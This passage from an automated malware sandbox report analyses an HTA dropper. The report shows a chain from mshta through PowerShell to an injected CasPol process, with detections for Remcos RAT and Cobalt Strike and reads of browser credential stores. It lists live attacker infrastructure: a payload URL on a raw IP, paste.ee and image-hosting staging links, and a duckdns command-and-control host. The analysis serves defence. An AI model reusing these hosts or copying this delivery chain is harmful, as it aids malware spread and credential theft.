                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7B2 GetComputerNameExW,GetUserNameW,12_2_0041A7B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044801F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-PVMSPMJump to behavior
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts1
                    Native API
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    2
                    Obfuscated Files or Information
                    111
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Email Collection
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts13
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares111
                    Input Capture
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    Bypass User Account Control
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object Model3
                    Clipboard Data
                    1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script221
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets34
                    System Information Discovery
                    SSHKeylogging1
                    Remote Access Software
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials21
                    Security Software Discovery
                    VNCGUI Input Capture2
                    Non-Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal Capture213
                    Application Layer Protocol
                    Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                    Process Injection
                    Proc Filesystem2
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574256 Sample: creamkissingthingswithcream... Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 50 paste.ee 2->50 52 newglobalfucntioninside.duckdns.org 2->52 54 2 other IPs or domains 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 15 other signatures 2->72 11 mshta.exe 1 2->11         started        signatures3 68 Connects to a pastebin service (likely for C&C) 50->68 70 Uses dynamic DNS services 52->70 process4 signatures5 92 Suspicious command line found 11->92 94 PowerShell case anomaly found 11->94 14 cmd.exe 1 11->14         started        process6 signatures7 96 Detected Cobalt Strike Beacon 14->96 98 Suspicious powershell command line found 14->98 100 Wscript starts Powershell (via cmd or directly) 14->100 102 PowerShell case anomaly found 14->102 17 powershell.exe 42 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 48 192.210.150.24, 49708, 80 AS-COLOCROSSINGUS United States 17->48 42 creamykissinglipsg...thingswithcream.vbS, Unicode 17->42 dropped 44 C:\Users\user\AppData\...\yy1wu0jg.cmdline, Unicode 17->44 dropped 74 Loading BitLocker PowerShell Module 17->74 24 wscript.exe 1 17->24         started        27 csc.exe 3 17->27         started        file10 signatures11 process12 file13 84 Detected Cobalt Strike Beacon 24->84 86 Suspicious powershell command line found 24->86 88 Wscript starts Powershell (via cmd or directly) 24->88 90 2 other signatures 24->90 30 powershell.exe 15 16 24->30         started        46 C:\Users\user\AppData\Local\...\yy1wu0jg.dll, PE32 27->46 dropped 34 cvtres.exe 1 27->34         started        signatures14 process15 dnsIp16 58 cloudinary.map.fastly.net 151.101.1.137, 443, 49715 FASTLYUS United States 30->58 60 paste.ee 104.21.84.67, 443, 49771 CLOUDFLARENETUS United States 30->60 104 Writes to foreign memory regions 30->104 106 Injects a PE file into a foreign processes 30->106 36 CasPol.exe 3 30->36         started        40 conhost.exe 30->40         started        signatures17 process18 dnsIp19 56 newglobalfucntioninside.duckdns.org 107.173.143.10, 14646, 49778, 49788 AS-COLOCROSSINGUS United States 36->56 76 Contains functionality to bypass UAC (CMSTPLUA) 36->76 78 Detected Remcos RAT 36->78 80 Contains functionalty to change the wallpaper 36->80 82 4 other signatures 36->82 signatures20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    creamkissingthingswithcreambananapackagecreamy.hta40%VirustotalBrowse
                    creamkissingthingswithcreambananapackagecreamy.hta24%ReversingLabsScript-WScript.Trojan.Asthma
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFz0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamyk0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFs0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF0%Avira URL Cloudsafe
                    http://www.microsoft.G0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFf0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF0%VirustotalBrowse
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFC:0%Avira URL Cloudsafe
                    http://www.microsoft.co#v0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFwp0%Avira URL Cloudsafe
                    http://www.microsoft.covVc0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFsx0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF#p0%Avira URL Cloudsafe
                    http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFR0%Avira URL Cloudsafe
                    newglobalfucntioninside.duckdns.org0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paste.ee
                    104.21.84.67
                    truefalse
                      high
                      cloudinary.map.fastly.net
                      151.101.1.137
                      truefalse
                        high
                        newglobalfucntioninside.duckdns.org
                        107.173.143.10
                        truefalse
                          high
                          res.cloudinary.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://paste.ee/r/o8fzA/0false
                              high
                              http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFtrue
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                high
                                newglobalfucntioninside.duckdns.orgtrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://192.210.150.24/55/creamykpowershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.microsoftpowershell.exe, 00000008.00000002.2517116385.0000000006DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://go.micropowershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com;powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFzpowershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.microsoft.Gpowershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://analytics.paste.eepowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.microsoft.powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFspowershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFfpowershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://go.microspowershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFC:powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFwppowershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://geoplugin.net/json.gpCasPol.exefalse
                                                              high
                                                              https://www.google.compowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.microsoft.co#vpowershell.exe, 00000008.00000002.2521068943.0000000007F00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.microsoft.covVcpowershell.exe, 00000003.00000002.2252958107.0000000008418000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://res.cloudinary.compowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtpowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFsxpowershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://analytics.paste.ee;powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF#ppowershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.microsoft.cpowershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFRpowershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2247409766.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000004401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
